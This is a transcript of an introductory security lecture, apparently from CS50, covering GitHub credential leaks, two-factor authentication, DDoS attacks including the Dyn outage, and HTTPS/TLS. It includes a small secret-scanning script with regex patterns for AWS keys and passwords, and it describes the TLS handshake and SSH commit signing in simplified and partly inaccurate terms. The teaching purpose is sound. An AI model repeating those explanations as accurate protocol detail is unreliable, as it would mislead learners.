DOUG LLOYD: Now that we know a bit more about the internet and how it works, let's reintroduce the subject of security with this new context. And let's start by talking about Git and GitHub. Recall that Git and GitHub are technologies used by programmers to version control their software, which basically allows them to save code to an internet-based repository, so that in case of some failure locally they have a backup copy, but also to keep track of all the changes they've made and possibly go back in time in case they produce a version of code that is broken. GitHub has some great advantages, but it also has potential disadvantages because of this structure of being able to go back in time.

So for example, imagine that what we have is an initial commit, and a commit is just Git parlance for a set of code that you are sending to the internet. So I've decided to take file A, file B, and file C in their current versions. I've saved them using Control-S or Command-S literally on my machine, and I want to send those versions to GitHub to be stored permanently or semi-permanently. You would package those up in what's called a commit and then push that code to GitHub, where it would then be visible online. And all the files that we view on GitHub are tracked in terms of commits. And commits chain together. We've seen this idea of chaining in the past when we've discussed linked lists, for example. Every commit records the commit that came before it, so once a new commit is pushed, the entire chain of history that preceded it is preserved.

So imagine we have an initial commit where we post some code, and then we make some more changes. We perhaps update our database in such a way that when we push our second commit to GitHub, we accidentally expose the database credentials. So perhaps someone inadvertently typed the password for how to access the database into some Python code that would then be used to access that database. That's not a good thing. And maybe somebody quickly realized it and said, you know what? We need to get this off of GitHub. It is a source repository. It's available online. And so they push a third commit to GitHub that deletes those credentials and stores them somewhere else that's not going to be saved in this repository.

But have we actually solved the problem? And you can probably imagine that the answer is no, because we have this idea of version control, where every past iteration of all of these files is still stored on GitHub such that, if I needed to, I could go back in time. So even though I attempted to solve the security crisis I just created for myself by introducing a new commit that removes the credentials from those files, so that if I'm looking just at the most recent version of the files I don't see them anymore, I still have the ability to go back in time. So this doesn't actually solve the problem.

See, one of the interesting things about GitHub is the model that is used for it. At the very beginning of GitHub's existence, it relied pretty extensively on this idea that you sign up for free, you get a free account for GitHub, and you have a limited number of private repositories, repositories that are not publicly viewable or searchable, and you could pay to have more of them if you wanted to.
But the majority of your repositories, assuming you did not opt into a paid account, were public, which meant anybody on the internet could search them using GitHub's search tool, or could just look for something using even a regular search engine such as Google. And if your GitHub repositories happened to match what that person searched, or specifically, if a user is looking for specific lines of code within GitHub's search feature, anything in a public repository is available. Now, GitHub has recently changed to a model where there's a higher limit on the number of private repositories that somebody can have. But this was part of GitHub's design to really encourage developers and programmers to create this open source community where anybody could view someone else's code and, in GitHub parlance, fork their code, which basically means to take their entire repository or collection of files and copy it into their own GitHub repository to perhaps make changes or suggest changes, pushing those back into the code base, with the idea being that it would make the entire community better. A side effect, of course, is that items get revealed when we do so because of this public repository setup we have here.

So GitHub is great in terms of its ability to let programmers store and refer to materials on the internet. They don't have to rely on their own local machines to store code. It allows people to work from multiple workstations, similar to how Dropbox or Google Drive, for example, might allow you to access files from different machines. You don't have to be on a specific machine to access a file, as we used to have to do before these cloud-based document storage services existed. And it encourages collaboration. For example, if you and I were to collaborate on a GitHub repository, I could push changes to that repository that you could then pull. And we could then be working off of the same code base again. We have this central area where we share our code with one another. And we can each individually make changes and incorporate one another's changes into the final products. So we're always working off of the same base of material. The side effect, though, again, is that this material is generally public unless you have opted into a private repository, where you have specific individuals, logged in with their GitHub accounts, with whom you want to share.

So is there a way to solve this problem, though, of accidentally exposing our credentials in a public repository? Of course, if we're in a private repository, this might not be as alarming. It's still not something to be encouraged, though; storing credentials for anything, anywhere on the internet, whether public or private, is a little risky. But is there a way to get rid of this, or to prevent this problem from happening? Fortunately, there are a number of different safeguards specific to Git and GitHub that we can use to prevent the accidental leakage of information, so to speak.

So for example, one way we can handle this is using a program or utility called git-secrets. git-secrets works by looking for what's called a regular expression. And a regular expression is computer science parlance for a particular formation of a string: a certain number of characters, a certain number of digit characters, maybe some punctuation marks. You can say, I'm looking for strings that match this idea. And you can express this idea, where this idea is all capital letters, all lowercase letters, this many numbers, this many punctuation marks, and so on, using this tool called a regular expression. git-secrets contains a list of these regular expressions and will warn you, when you are about to make a commit or push code to GitHub to be stored in its online repository, that you have a string that matches a pattern you asked to be warned about. And so be sure, before you commit and push that code, that you actually intend to send it up to GitHub, because it may be that this matches a password string that you're trying to avoid leaking. So that's an interesting tool that can be used for that.
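To make that concrete, here is a minimal sketch of the kind of scan a tool like git-secrets performs, written in Python. The two patterns are illustrative examples, not git-secrets' actual rule list; run from a pre-commit hook, a nonzero exit status would block the commit.

```python
import re
import sys

# Illustrative patterns in the spirit of git-secrets' rules (hypothetical).
PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                 # shape of an AWS access key ID
    re.compile(r"(?i)password\s*=\s*['\"].+['\"]"),  # hard-coded password assignment
]

def scan(path):
    """Return (path, line number, text) for every line matching a pattern."""
    hits = []
    with open(path, encoding="utf-8", errors="ignore") as f:
        for lineno, line in enumerate(f, 1):
            if any(pat.search(line) for pat in PATTERNS):
                hits.append((path, lineno, line.strip()))
    return hits

if __name__ == "__main__":
    findings = [hit for path in sys.argv[1:] for hit in scan(path)]
    for path, lineno, text in findings:
        print(f"{path}:{lineno}: possible secret: {text}")
    sys.exit(1 if findings else 0)  # nonzero exit would abort the commit in a hook
```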
You also want to consider limiting third party app access. GitHub accounts are actually very commonly used as other forms of login, for example. There's an open standard called OAuth which allows you to use, for example, your Facebook account or your Google account to log into other services. Perhaps you've encountered this in your own experience working with different services on the internet. Instead of creating a login for site X, you could use your Facebook or Google login, or, in many instances as well, your GitHub login to do so. When you do so, though, you are allowing that third party application, someone that's not GitHub, the ability to use and access your GitHub identity or credential. And so you should be very careful, with not only GitHub but other services as well, thinking about whether you want that other service to have access to your GitHub, or Facebook, or Google account information, even just for authentication. It's a good idea to try to limit how much third party app access you're giving to other services.

Another tool is to use something called a commit hook. Now, a commit hook is just a fancy term for a short program or set of instructions that executes when a commit is pushed to GitHub. So for example, many of the course websites that we use here at Harvard for CS50 are GitHub-based, which means that when we want to change the content on the course website, we update some HTML, or Python, or JavaScript files, we push those to GitHub, and that triggers a commit hook, where basically that commit hook copies those files onto our web server and runs some tests on them to make sure that there are no errors in them. For example, if we wrote some JavaScript or Python that was broken, that had a bug in it, we'd rather not deploy that bug, so to speak. We wouldn't want the broken version of the code to replace the currently working website. And so a commit hook can be used to do testing as well. And then once all the tests pass, we are able to activate those files on the web server, and the changes have happened. So we're using GitHub to store the changes that we want to make on our site, the HTML, the Python, the JavaScript changes, and then we're using this commit hook, a set of instructions, to copy them over and actually deploy those changes to the website once we've verified that we haven't broken anything. You can also use commit hooks, for example, to check for passwords and have them warn you if you have perhaps leaked a credential. And then you can undo that leak with a technique that we'll see in just a moment.

Another thing that you can do when using GitHub to protect or verify your identity is to use an SSH key. SSH keys are a special form of a public and private key.
In this case, it's really not used for encryption, though. It's actually used as identification. And so this idea of digital signatures, which you may recall from a few lectures ago, comes back into play. Whenever I use an SSH key to push my code to GitHub, what happens is I also digitally sign the commit when I send it up. And so before that commit gets posted to GitHub, GitHub verifies this by checking my public key and verifying, using the mathematics that we've seen in the past, that, yes, only Doug could have sent this to me, because only Doug's public key will unscramble this set of zeros and ones that I received, which could only have been created by his private key. These two things are reciprocal of one another. So we can use SSH keys and digital signatures as an identity verification scheme for GitHub, just as we might for mailing or sending documents, or something like that.

Now, imagine we have posted the credentials accidentally. Is there a way to get rid of them? GitHub does track our entire history. But what if we do make a mistake? Human beings are fallible. And so there is a way to actually eliminate the history, and that is using a command called git rebase. So let's go back to the illustration we had a moment ago where we have several different commits. And I've added a fourth commit here just for purposes of illustration. So we have our first commit and our second commit, and then it's after that that we expose the credentials accidentally, and then we have a fourth commit where we actually delete that mistake that we had previously made. When we git rebase, the idea is that we want to delete a portion of the history. Now, deleting a portion of the history has a side effect: any changes that I made in the commits we're deleting, in this illustration the last two, are also going to be destroyed, not just the accidentally exposed credentials. And so it's going to be incumbent on us to make sure to copy and save the changes we actually want to preserve, in case we've done more than just expose the credentials, and then make a new commit in this new history we create so that we can still keep those changes. But let's say that, other than the credentials, I didn't actually do anything else. One thing I could do is rebase, basically setting this second commit as the new end of the chain. So instead of going all the way to the fourth commit and having that preserved ad infinitum, I want to just get rid of everything after the second commit. And I can do that. And then those commits are no longer remembered by GitHub. The next commit I make would go right after the second commit, as opposed to a fifth one right after the commit that removed the credentials. Those deleted commits are, for all intents and purposes on GitHub, forgotten.
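On the command line, that history rewrite might look something like the following sketch, assuming the last good commit's hash is abc1234 and the branch is named main (both made-up names for illustration). Note that rewriting published history requires a force push, which affects anyone else who has cloned the repository.

```
git log --oneline              # find the hash of the last good commit, e.g., abc1234
git rebase -i abc1234          # interactively drop the commits that came after it
git push --force origin main   # overwrite the history that GitHub has stored
```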
And finally, one more thing that we can do when using GitHub is to mandate the use of two-factor authentication. Recall we've discussed two-factor authentication a little bit previously. And the idea is that you have a backup mechanism to prevent unauthorized login. The two factors in two-factor authentication are not two passwords, because those are fundamentally quite similar. The idea is that you want to have something that you know, for example, a password, which is very commonly one of the two factors, and something that you have, the thought being that an adversary is incredibly unlikely to have both things at the same time. They may know your password, but they probably don't have your cell phone, for example, or your RSA key. They may have stolen your phone or your RSA key, but they probably don't also know your password. And so the idea is that this provides an additional level of defense against potential hacking, or breaking into accounts, or unauthorized behavior in accounts that you obviously don't want to happen.

Now, an RSA key, if you're unfamiliar, is a hardware token that looks like this. There are different versions of them. They've sort of evolved over time. This one is actually a combined RSA key and USB drive. And inside the window here of the RSA key is a six digit number that changes every 60 seconds or so. So when you are given one of these, for example at a firm or a business, it is assigned to you specifically. There's a server that your IT team will have set up that maps the serial number on the back of this RSA key to your employee ID, for example. But they otherwise don't know what the number currently showing on the RSA key is. They only know who owns it, who is physically in possession of it, which employee ID it maps to. And every 60 seconds the number changes according to some mathematical algorithm built into the key that generates numbers in a pseudorandom way. And after 60 seconds, that code will change into something else. And you'll need to actually have the key on you to complete a login. If an RSA key is being used to secure a login such that you need to enter a password and your RSA key value, you would need to have both. No other employee's RSA key could be used to log in -- well, hypothetically, I guess there's a one in a million chance that another key would happen to be randomly showing the same number at the same time, but for all practical purposes, only yours could be used to log in.

Now, there are several different tools out there that can be used to provide two-factor authentication services. And there's really no technical reason not to use these services. You'll find them as applications on cell phones, most likely. And you'll find ones like this: Google Authenticator, Authy, Duo Mobile. There are lots of others. And if you don't want to use one of those applications specifically, many services also just allow you to receive a text message from the service itself. And you'll just get that via SMS on your phone, so still on your phone, just not tied to a specific application.
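Most of these apps implement the time-based one-time password (TOTP) algorithm standardized in RFC 6238, which is the same idea as the RSA key: a shared secret plus the current time yields a short-lived six-digit code. Here is a minimal sketch using only Python's standard library; the Base32 secret is a made-up example of the kind a service hands you when you enroll.

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """Compute the current time-based one-time password (RFC 6238)."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval           # which 30-second window we're in
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                       # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10**digits).zfill(digits)

# Hypothetical enrollment secret; a real one comes from the service's QR code.
print(totp("JBSWY3DPEHPK3PXP"))
```

Because the server and your phone both run this same computation on the same secret, the server can check your code without anything being transmitted at login time other than the six digits themselves.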
And while there's no technical reason to avoid two-factor authentication, there is this sort of social friction surrounding it, in that human beings tend to find it annoying, right? It used to be username, password, you're logged in. It's pretty quick. Now it's username, password, you get brought to another screen, you're asked to enter a six-digit code, or maybe in some advanced applications you get a push notification sent to your device that you have to unlock and then hit OK on. And people just find that inconvenient. We haven't yet reached the point culturally where two-factor authentication is the norm. And so it's sort of a linchpin when we talk about security in the internet context: human beings are the limiting factor for how secure we can be. We have the technology to take steps to protect ourselves, but we don't feel compelled to do so. And we'll see this pattern reemerge in a few other places today. But just know that that is why perhaps you're not seeing so much adoption of two-factor authentication. It's not that it's technically infeasible. It's just that we find it annoying, and so we don't adopt it as aggressively as perhaps we should.

Now let's discuss a type of attack that occurs on the internet with unfortunate regularity, and that is the denial of service attack. The idea behind these attacks is basically to cripple the infrastructure of a website. Now, the reason for this might be financial: you want to try to sabotage somebody. There might be other motivations, distraction, for example; by tying up the target's resources trying to stop the attack, it opens up another avenue to do something else, perhaps to steal information. There are many different motivations for why adversaries do this. And some of them are honestly just boredom or fun. Amateur hackers sometimes think it's fun to just initiate a denial of service attack against an entity that is not prepared to handle it.

Now, in the associated materials for this course, we provided an article called Making Cyberspace Safe for Democracy, which we really do encourage you to take a look at, read, and discuss with your group. But I also want to take a little bit of time right now to talk about this article in particular and draw your attention to some areas of concern, or some areas that might lead to more discussion. The biggest of these is that these attacks tend not to be taken very seriously by people when they hear about them. You'll occasionally hear about these attacks in the news, denial of service attacks, or their cousin, distributed denial of service attacks. But culturally, again, us being humans and sort of neglecting some of the real security concerns here, we don't think of it as an attack. And that's maybe because of how we hear about other kinds of attacks on the news that seem more physically devastating, that have more real consequences. And it makes it hard to have a serious conversation about cyber attacks, because there's this friction that we face trying to get people to understand that these are meaningful and real.

And in particular, these attacks are kind of insidious. They're really easy to execute without much difficulty at all, especially against a small business that might be running its own server as opposed to relying on a cloud service. A pretty top-of-the-line, commercially available machine might be able to execute a denial of service, or DoS, attack on its own. It doesn't even require exceptional resources. Now, when we start to attack mid-sized companies, or larger companies or entities, one single computer from one single IP address is not typically going to be enough. And so instead, you would have a distributed denial of service attack. In a distributed denial of service attack, there is still generally one core hacker, or one collective group of hackers or adversaries, trying to penetrate some company's defenses. But they can't do it with their own machine. And so what they do is create something called a botnet. Perhaps you've heard this term before. A botnet is created when hackers or adversaries distribute worms or viruses surreptitiously. Perhaps they packaged them into some download.
People don't notice anything about the worm, or about this program that has been covertly installed on their machine. It doesn't do anything in particular until it is activated. And then it becomes an agent, or a zombie, as you'll sometimes hear it termed, controlled by the hackers. And so all of a sudden the adversaries gain control of many different devices, hundreds or thousands or tens of thousands, or even more in some of the bigger attacks that have happened, rendering all of those computers under their control and able to be directed to take whatever action the adversaries want. And in particular, in the case of a distributed denial of service attack, all of these computers are going to make web requests to the same server or same website, because that's the idea. Between distributed denial of service attacks and regular denial of service attacks, it's really just a question of scale. We're hitting those servers with so many web requests, I want to access this, I want to access this, hundreds, thousands, tens of thousands of requests a second, such that the server can't possibly field all of the inquiries coming in and give the requests the data they're asking for. After enough time, that would result in the server just crashing, throwing up its hands and saying, I don't know what to do; I can't possibly process all of these requests. But even just by tying it up in this way, the adversary has succeeded in damaging the infrastructure of the server. It's either denied the server the ability to process customers and payments, or it's just taken down the entire website, so there's no information available about the company anymore to anybody who's trying to look it up.

These attacks are actually really, really common. There are surveys out there assessing that roughly one sixth to one third of the average-sized businesses taking part in a yearly tech survey, so 17% to 33% or so, suffer some sort of DoS attack in a given year, which is a lot of businesses when you think about it. And these attacks are usually quite small, and they're certainly not newsworthy. They might last a few minutes. They might last a few hours. But they're enough to be disruptive. They're certainly noteworthy to the business that suffers them. And they're something to avoid if possible.

Cloud computing has made this problem somewhat worse. And the reason is that, in a cloud computing context, the server that is running your business is not physically located on your premises. It was often the case that when a business ran a website, or ran its business, it would have a server room with the software necessary to run that website or whatever software-based services it provided. And it was all local to that business. No one else could possibly be affected.
But in a cloud computing context, we are generally renting server space and server power from an entity such as Amazon Web Services, or Google Cloud, or some other large provider, where it might be that 10, 20, 50, depending on the size of the businesses in question, multiple businesses are sharing the same physical resources and the same server space, such that if any one of those, say, 50 businesses is targeted by hackers or adversaries for a denial of service attack, that might actually, as collateral damage, take out the other 49 businesses. They weren't even part of the attack. We've heard about cloud computing as a great thing. It allows us to scale out our websites, so that we can handle more customers. It takes away the problem of web-based security, because we're outsourcing that to the cloud provider. But it introduces this new problem: if we're all sharing the resources and any one of us gets attacked, then all of us lose the ability to access and use those resources, which might cause all of our organizations to suffer the consequences of one single attack.

This collateral damage can get even worse when you think about businesses whose service is providing the internet itself, OK? A very noteworthy example of this happened in 2016 with a service called Dyn, D-Y-N. Dyn is a DNS service provider, DNS being the domain name system. And the idea there is to map things like www.google.com to their IP addresses. Because in order to actually access anything on the internet, or to have a communication with anyone, you need to know their IP address. And as human beings, we tend not to remember what some website's IP address is, much like we may not recall a certain phone number. But if it has a mnemonic attached to it, we do better. For example, back in the day we had 1-800-COLLECT for collect calls. If you forgot the literal digits of that phone number, you could still remember the idea of it, because you had this mnemonic device to remind you. Domain names, www.whatever.com, are just mnemonic devices that we use to refer to an IP address. And DNS servers provide this service to us.
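To see that mapping in action, here is a two-line sketch using Python's standard library, which simply asks the operating system's configured DNS resolver to do the translation; the printed address will vary by region and over time.

```python
import socket

# Translate a mnemonic domain name into the IP address browsers actually use.
print(socket.gethostbyname("www.google.com"))  # e.g., 142.250.80.36
```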
Dyn is one of the major DNS providers for the internet overall. And if a denial of service attack, or in this case certainly a distributed denial of service attack, because it was enormous, goes after that server, hitting its IP address over and over and over, then it is unable to field requests from anyone else, because it's just getting pummeled by all of these requests from some botnet that some adversary or collective of adversaries has taken control of. The collateral damage is that no one can map a domain name to an IP address, which means no one can visit any of these websites unless they happened to know at the outset what the IP address of a given website was. If you knew the IP address, this wasn't a problem. You could still go directly to that IP address. That's not what was attacked here. The attack instead tied up the ability to translate these mnemonic names into numbers. And as you can see, Dyn was, or is, a DNS provider for much of the eastern half of the United States as well as the Pacific Northwest and California. And if you think about what kinds of businesses are headquartered in the Pacific Northwest, and in California, and in the New York area, for example, you can probably see that some major, major services were affected, including GitHub, which we've already talked about today, but also Facebook and others. Harvard University's website was also taken down for several hours. This attack lasted about 10 hours, so quite prolonged. It really did a lot of damage on that day. It really crippled the ability of people to use the internet for a long period of time, so quite interesting.

This article also talks a bit about how the United States legislature has decided to handle these kinds of issues, computer-based attacks. It takes a look at the Computer Fraud and Abuse Act, which is codified at 18 USC 1030. This is really the only general computer crimes law on the books, and it talks about what it means to be a protected computer. And you'll perhaps be interested to know that pretty much any computer is a protected computer. The law specifically calls out government computers as well as any computer that may be involved in interstate commerce, which, as you can imagine, covers anybody who uses the internet; their computer then falls under the ambit of this act. So it's another interesting thing to take a look at if you're interested in how we deal with prosecuting computer-based crimes. All of it is actually dealt with in the Computer Fraud and Abuse Act, which is not terribly long and hasn't been updated extensively since the 1980s, other than some small amendments. So it's kind of interesting that we have not yet gotten to the point where we are defining and prosecuting specific types of computer crime, even though we've begun to identify different types of computer crimes, such as DoS attacks, such as phishing, and so on.

Now, hypothetically, a simple denial of service attack should be pretty easy to stop. And the reason for that is that there's only one source making the attack. Recall that requests on the web happen via HTTP, carried over TCP/IP, and the sender's IP address is part of the envelope that gets sent over, such that the server that wants to respond to the client, or the sender, can just reference it. It's the return address. You need to be able to know where to send the data back to. And so if there are thousands of requests coming from a single IP address, and you see that happening, you can just decide, as a server, in the software, to stop accepting requests from that address. DDoS attacks, distributed denial of service attacks, are much harder to stop, and it's exactly because there is not a single source. If there's a single source, again, we would just completely stop accepting any requests of any type from that computer. However, because we have so many different computers to contend with, the options to handle this are a bit more limited. There are some techniques for averting these attacks or stopping them once they are detected, however, the first of which is firewalling. The idea of a firewall is that we are only going to allow requests of a certain type. We're going to allow them from any IP address, but we're only going to accept them on certain ports. Recall that TCP/IP gives us the ability to say this service comes in via this port: HTTP requests come in via port 80, and HTTPS requests come in via port 443.
So imagine a distributed denial of service attack where typically the site would expect to be receiving requests via HTTPS. It generally only uses secured HTTP to process whatever requests are coming in. So it's expecting to receive a lot of traffic on port 443. And then all of a sudden a distributed denial of service attack begins, and it's receiving lots of requests on port 80. One way to stop that attack before it starts to tie up resources is to just put a firewall up and say, I'm not actually going to accept any requests on port 80. This may have a side effect of denying certain legitimate requests. But since the vast majority of the traffic the site receives comes in via HTTPS on port 443, that's a small price to pay. I'd rather just allow the legitimate requests to come in. So that's one technique.

Another technique is something called sinkholing. And it's exactly what you probably think it is. A sinkhole, as you probably know, is a hole in the ground that swallows everything up. And a sinkhole in a digital context is basically a big black hole for data. It's just going to swallow up every single request and not allow any of them through. So this would, again, stop the denial of service attack, because it's taking all the requests and basically throwing them in the trash. This won't take down the website of the company that's being attacked, so that's a good thing. But it's also not going to allow any legitimate traffic of any type through, so that might be a bad thing. But if the attack seems like it's going to be short, the requests may trickle off and stop once the attackers realize they're not getting the results they had hoped for, and they give up. Then the sinkhole could be removed, and regular traffic could start to flow through again. So a sinkhole basically takes all the traffic that comes in and throws it in the trash.

And then finally, another technique we could use is something called packet analysis. Again, HTTP, we know, is how requests happen on the web. And we learned a little bit about the headers that are packaged alongside those HTTP packets: where the request originated from, where it's going to. There's a whole lot of other metadata as well. You'll know, for example, what type of browser the individual is using, what operating system perhaps they are using, and roughly where, geographically, they are. Are they in the US Northeast? Are they in South America? And so on. Instead of deciding to restrict traffic via specific ports, or to restrict all traffic, we could still allow all traffic to come in but inspect the packets as they arrive. So for example, perhaps we expect most of the traffic on our site to come from, just because I used that example already, the US Northeast. And then all of a sudden we are experiencing tons of packets whose headers say that they're from South America, or the US West Coast, or somewhere else that we don't expect. We can decide, after taking a quick look at each packet and analyzing those individual headers, that we're not going to accept packets from that location. The ones that match locations we're expecting, we'll let through. And this, again, might prevent certain legitimate customers, who might actually be based in South America, from getting through. But in general, it's going to block most of the damaging traffic.
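Here is a minimal sketch of the simplest of these ideas, turning away a single address that is flooding us, written with Flask since that's the framework we'll see later. The window and limit are made-up thresholds, and a real deployment would typically do this in a firewall or load balancer rather than in the application itself.

```python
import time
from collections import defaultdict, deque

from flask import Flask, abort, request

app = Flask(__name__)

WINDOW = 10   # seconds to look back (illustrative threshold)
LIMIT = 100   # max requests per window per address (illustrative threshold)
history = defaultdict(deque)  # IP address -> timestamps of its recent requests

@app.before_request
def turn_away_floods():
    now = time.time()
    recent = history[request.remote_addr]
    recent.append(now)
    while recent and now - recent[0] > WINDOW:  # drop timestamps outside the window
        recent.popleft()
    if len(recent) > LIMIT:
        abort(429)  # Too Many Requests: stop serving this address

@app.route("/")
def index():
    return "hello, world"
```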
DDoS attacks are really frustrating for companies, because they really can do a lot of damage. Usually the resources of the company being attacked, especially if they're cloud-based and can rely on their cloud provider to help them scale up, are enough to eventually outlast the attacker, who usually has a much more limited set of resources. But again, depending on the type of business being attacked, and think once more of the example of Dyn, the DNS provider, the ramifications of one of these attacks can be really quite severe, and really quite annoying and costly for the business that suffers it.

So we just talked about HTTP and HTTPS a moment ago when we were talking about firewalling, allowing traffic on some ports but not others, so maybe allowing HTTPS traffic but not HTTP traffic. Let's take a look at these two technologies in a bit more detail. HTTP, again, is the hypertext transfer protocol. It is how hypertext, or web pages, are transmitted over the internet. If I am a client and I make a request to you for some HTML content, then you as a server would send a response back to me, and then I would be able to see the page that I had requested. And every HTTP request has a specific format at the beginning of it. For example, we might see something like this: GET /execed HTTP/1.1, Host: law.harvard.edu. Let's just quickly pick these apart one more time. If you see GET at the beginning of an HTTP request, it means please fetch, or get, for me, literally, this page. The page I'm requesting specifically is /execed. And the host that I'm asking it from is, in this case, law.harvard.edu. So basically what I'm saying here is please retrieve for me the HTML content that comprises http://law.harvard.edu/execed. And specifically I'm doing this using HTTP protocol version 1.1. We're still largely using version 1.1, which was defined about 20 years ago, even though version 2 now exists. And basically this is just HTTP's way of identifying how you're asking the question. It's similar to me making a request and saying, oh, by the way, the rest of this request is written in French, or, oh, by the way, the rest of this request is written in Spanish. It's more like, here are the parameters that you should expect to see, because this request is in version 1.1, which differed non-trivially from version 1.0. So it's just an identifier for how exactly we are formatting our request.
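You can see exactly that format on the wire by writing the request by hand over a plain TCP socket, as in this short sketch using Python's standard library. The server will most likely answer with a redirect telling us to use HTTPS instead, which is itself instructive.

```python
import socket

# The same request a browser would send, spelled out byte for byte.
request = (
    "GET /execed HTTP/1.1\r\n"
    "Host: law.harvard.edu\r\n"
    "Connection: close\r\n"
    "\r\n"
)

with socket.create_connection(("law.harvard.edu", 80)) as sock:
    sock.sendall(request.encode())
    response = b""
    while chunk := sock.recv(4096):
        response += chunk

print(response.decode(errors="replace")[:300])  # status line and first headers
```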
But HTTP is not encrypted. And so if we think about making a request to a server, with the client on the left and the server on the right, it might go something like this. The odds are pretty low that, when we make a request, we are so close to the server that the request wouldn't need to hop through any routers along the way. Remember routers: their purpose in life is to send traffic in the right direction. And they contain a table of information that says, if a request is headed to some server over there, then the best path is through here, and each router hands the request to the next. Their job is to optimize and find the best path to get the request to where it needs to be.

So if I, as the client, initiate a request to the server, it's going to first go through router A, which is going to say, OK, I'm going to move it closer to the server; it goes to router B, then to router C. And eventually router C perhaps is close enough to the server that it can just hand off the request directly. The server is then going to get that request, read it as HTTP/1.1, look at all the other metadata inside of the request to see if there's anything else it's being asked for, and then send the information back. And in this example I'm having it go back through the same chain of routers in reverse. But in reality that might be different. It might not go through the exact same three routers in reverse. It might take a different path, depending on the traffic on the network, how congested things are, and whether a better path emerged in the time it took to process the request.

But remember: HTTP, not secured. Not encrypted. This is plain, over-the-air communication. We saw previously, when we took a look at a screenshot from a tool called Wireshark, that it's not that difficult, on an unsecured network using an unsecured protocol, to literally read the contents of those packets going back and forth. So that's a vulnerability here for sure. Another vulnerability is that any one of these computers along the way could be compromised. A router is just a computer as well. So perhaps router A was infected by an adversary with some worm that will eventually make it part of some botnet and start spamming some server somewhere. If router A is compromised in such a way that an adversary can read all the traffic that flows through it, and again, we're sending all of our traffic in an unencrypted fashion, then we have another security loophole to deal with.

So HTTPS resolves this problem by securing, or encrypting, all of the communications between a client and a server. HTTP requests go to one port; we talked about that already. They go to port 80 by convention. HTTPS requests go to port 443 by convention. In order for HTTPS to work, the server is responsible for possessing what's called a valid SSL or TLS certificate. SSL is actually a deprecated technology now. It's been subsumed into TLS. But typically these things are still referred to as SSL certificates. And perhaps you've seen a screen that looks like this when you're trying to visit some website. You get a warning that your connection is not private. And at the very end of that warning, you are informed that the cert date is invalid. Basically this just means that the site's SSL certificate has expired.

Now, what is an SSL certificate? There are services that work alongside the internet called certificate authorities. GlobalSign, for example, from whom I borrowed these screenshots, is one; GoDaddy, who is also a very popular domain name provider, is a certificate authority as well. And what they do is verify that a particular website owns a particular public key, which has a corresponding private key. And the way they do that is the website digitally signs something and presents it to the certificate authority.
The certificate authority then goes through those exact same checks that we've seen before for digital signatures to verify that, yes, this person must own this public key. And the idea is that we're trusting that, when I send a communication to you as the website owner using the public key that you say is yours, it really is yours. There really is some third party that we've decided to collectively trust, the certificate authority, who is going to verify this.

Now, why does this matter? Why do we need to verify that someone's public key is what they say it is? Well, it turns out that this idea of asymmetric encryption, or public and private key cryptography, which we've previously discussed, does form part of the core of HTTPS. But as we'll see in a moment, we don't actually use public and private keys to communicate, except at the very, very beginning of our interaction with a site over HTTPS. The way this really happens underneath the hood is via the secure sockets layer, SSL, which has now been folded into the overall transport layer security, or TLS, protocol. And this is what happens. When I am requesting a page from you, and you are the server, and I am requesting it via HTTPS, I am going to initially make a request using the public key that I believe is yours, because the certificate authority has vouched for you, saying that I would like to initiate an encrypted exchange. I don't want to send that request in the clear. So I send a request to you, encrypting it using your public key. You receive the request. You decrypt it using your private key. You see, OK, I see now that Doug wants to initiate a session with me, and you're going to fulfill the request. But you're also going to do one other thing. You're going to generate a key, not your public or private key, a different key, and send it back to me alongside the response to the request that I made, encrypted using my public key.

So the initial volley of communications back and forth between us is the same as any other encrypted communication using public and private keys that we've previously seen. I send a message to you using your public key. You decrypt it using your private key. You respond to me using my public key, and I decrypt it using my private key. But this is really slow. If we're just having communications back and forth via mail, or even via text, the difference of a few milliseconds is immaterial. We don't really notice it. But on the web, we do notice it, especially if we're making multiple requests, or there are multiple packets going back and forth and every single one of them needs to be encrypted. So beyond this initial volley, public and private key encryption is no longer used, because it's too slow. We would notice it if it were.

Instead, as I mentioned, the server is going to respond with a key. And that key is the key to a cipher. We've talked about ciphers before, and we know that they are reversible. The particular cipher in question here is something called AES. But it is just a cipher. It is reversible. And the key that you receive is the key that you are supposed to use to decrypt, and to encrypt, all future communications to and from the server until the session, so called, is terminated. This key is called the session key. And the session is basically as long as you're on the site and you haven't logged out or closed the window. That is the idea of a session. It is one singular experience with a page, or with a set of pages that are all part of the same domain.
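Here is a sketch of that symmetric-session idea in Python, using the third-party cryptography package for AES. Note this is a simplification for illustration: in modern TLS the two sides typically derive the session key together through a key exchange rather than one side simply mailing it over, but the end state is the same, a shared AES key used for everything after the handshake.

```python
# pip install cryptography   (third-party package, not the standard library)
import os

from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# The handshake's end result: both sides hold the same random session key.
session_key = AESGCM.generate_key(bit_length=128)
cipher = AESGCM(session_key)

# Every message for the rest of the session uses the fast symmetric cipher.
nonce = os.urandom(12)  # a fresh nonce per message
ciphertext = cipher.encrypt(nonce, b"GET /account HTTP/1.1", None)
print(cipher.decrypt(nonce, ciphertext, None))  # b'GET /account HTTP/1.1'
```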
We're just going to use a cipher for the rest of the time that we talk. Now, this may seem insecure for reasons we've discussed when we talked about ciphers and how they can be flawed. Recall that some of the really early, classic ciphers, like Caesar and Vigenère, are very easy to break. AES is much more complex than that. And the other upside is that this key, like I mentioned, is only good for a session. So in the unlikely event that the server chooses a bad key, to think of it in Caesar's terms, a key of zero, which doesn't actually shift the letters at all, or a key of one, which barely obscures them, even if the key is compromised, it's only good for that particular session, which is not a very long amount of time. And the upside is that the ability to encipher and decipher information is much faster. If the cipher is reversible, it's pretty quick to do some mathematical manipulation to transform a message into something that looks like obscured gibberish, and to undo that as well. And so even though public and private keys are, we consider, effectively unbreakable, to the point that it's mathematically untenable to crack a message encrypted that way, we don't rely on them for the whole of SSL, because it's impractical to expect communications to go that slowly. And so we fall back on these ciphers. That really is what's happening when you're using secured, encrypted communication via HTTPS: you're relying on a cipher, one that just happens to be a very, very fancy cipher whose key should, hypothetically, be very difficult to figure out.

